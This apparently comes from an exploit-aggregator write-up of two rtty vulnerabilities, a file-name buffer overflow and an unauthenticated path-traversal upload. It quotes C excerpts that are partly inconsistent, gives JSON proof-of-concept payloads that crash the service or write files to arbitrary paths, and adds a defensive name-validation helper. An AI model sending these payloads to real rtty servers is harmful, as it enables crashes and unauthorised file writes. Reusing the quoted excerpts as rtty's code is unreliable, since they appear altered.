## https://sploitus.com/exploit?id=257FED44-A54B-5842-A9EF-409B92DE6D91
# CVE-2025-56708 & CVE-2025-56709  
## CVE-2025-56709: savepath Buffer Overflow  
### Vulnerability Description  
In the line:  
`ctx->total_size = ctx->remain_size = buffer_pull_u32be(info);`  

The code then proceeds as follows:  
```c
ment = find_mount_point(savepath);  
if (ment) {  
    uint64_t avail;  

    if (!strcmp(ment->mnt_type, "ramfs")) {  
        struct sysinfo si;  

        if (sysinfo(&si)) {  
            log_err("Download file failed: '%s'\n", strerror(errno));  
            goto check_space_fail;  
        }  
    }  
    else if (!statvfs(ment->mnt_dir, &sfs)) {  
        avail = sfs.f_bavail * sfs.f_frsize;  
    }  
    else {  
        log_err("Download file failed: '%s'\n", strerror(errno));  
        goto check_space_fail;  
    }  
} else {  
    log_err("Download file failed: '%s' not found\n", savepath);  
    goto check_space_fail;  
}  
```  
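The block above checks whether there is enough space to store the downloaded file. The code then copies `len - 4` bytes of the peer-supplied file name into `name`, with no length check visible in this excerpt, and refuses to continue if the file already exists:  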
```c
buffer_pull(info, name, len - 4);  
if (!access(savepath, F_OK)) {  
    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_ERR_EXIST, NULL, 0);  
    log_err("The file '%s' already exists\n", name);  
    goto open_fail;  
}  
```  
If the file cannot be opened, an error message is sent.  
```c
fd = open(savepath, O_WRONLY | O_TRUNC | O_CREAT, 0644);  
if (fd < 0) {  /* open() returns -1 on failure, not NULL */  
    log_err("Failed to create the file '%s': %s\n", name, strerror(errno));  
    goto open_fail;  
}  
```  
Finally, the code logs information about the download process:  
```c
log_info("Downloaded file: %s, size: %u\n", savepath, ctx->total_size);  
```

### Close File
```c
if (fd != NULL)
    close(fd);
else
    ctx->fd = fd;

/* Reply to the peer: 4-byte total size followed by the file name. */
memcpy(buf, &ctx->total_size, 4);
strcpy(buf + 4, name);

send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_INFO, buf, 4 + strlen(name));

return;

check_space_fail:
    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_NO_SPACE, NULL, 0);
    buffer_pull(info, name, len - 4);
}
```

### Vulnerability POC
- Continuously sending data using WebSocket can cause the service to crash (possibly leading to RCE).
```json
{"type":"fileInfo","name":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","size":50}
```

### Vulnerability Fixes
https://github.com/zhaojh329/rtty/issues/139

## CVE-2025-56708: Unauthorized File Upload
### Vulnerability Overview
rtty versions up to and including v9.0.0 have a directory traversal vulnerability. The fileInfo method of the interaction protocol contains a logic flaw: an attacker who hijacks the WebSocket can call fileInfo and upload files to any path on the system without logging in.

### Vulnerability POC
- Hijacking the WebSocket process and using the fileInfo method to upload files to any directory in the system without user login.
- Specifying the mount directory
```json
{"type":"fileInfo","name":"home/xk/xxx/xxx/fuck1","size":50}
```

- Specifying the file
```json
{"type":"fileInfo","name":"home/xk/xxx/xxxx/test/rtty/rtty/build/src/hello1","size":50}
```

- Generating files on the server side
![Vulnerability diagram](image.png)

### Vulnerability Fixes
https://github.com/zhaojh329/rtty/issues/140
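
Both issues above come from trusting the peer-supplied `name` field: its length (CVE-2025-56709) and its path components (CVE-2025-56708). The following is an added example, not rtty's code or its actual fix (see the linked issues for that); `build_save_path` and its parameters are hypothetical. It validates the name and its length before anything is copied into a fixed-size path buffer.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not rtty code): build "<dir>/<name>" from an untrusted,
 * length-prefixed name. Returns 0 on success, -1 if the name is rejected. */
int build_save_path(char *out, size_t out_sz, const char *dir,
                    const char *name, size_t name_len)
{
    size_t dir_len = strlen(dir);

    /* Empty names and embedded NUL bytes are never valid file names. */
    if (name_len == 0 || memchr(name, '\0', name_len))
        return -1;

    /* Bare file name only: a '/' would let the peer pick the directory. */
    if (memchr(name, '/', name_len))
        return -1;

    /* "." and ".." name directories, not files. */
    if ((name_len == 1 && name[0] == '.') ||
        (name_len == 2 && name[0] == '.' && name[1] == '.'))
        return -1;

    /* dir + '/' + name + NUL must fit; check before any byte is copied. */
    if (out_sz < dir_len + 2 || name_len > out_sz - dir_len - 2)
        return -1;

    memcpy(out, dir, dir_len);
    out[dir_len] = '/';
    memcpy(out + dir_len + 1, name, name_len);
    out[dir_len + 1 + name_len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed inputs: a plain name, a nested path, an oversized name. */
    char out[64], big[400];
    const char *nested = "home/xk/build/src/hello1";

    memset(big, 'a', sizeof(big));
    printf("plain:  %d\n", build_save_path(out, sizeof(out), "/tmp", "hello1", 6));
    printf("nested: %d\n", build_save_path(out, sizeof(out), "/tmp", nested, strlen(nested)));
    printf("big:    %d\n", build_save_path(out, sizeof(out), "/tmp", big, sizeof(big)));
    return 0;
}
```

This covers name handling only; the missing login check described in the overview needs its own fix.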
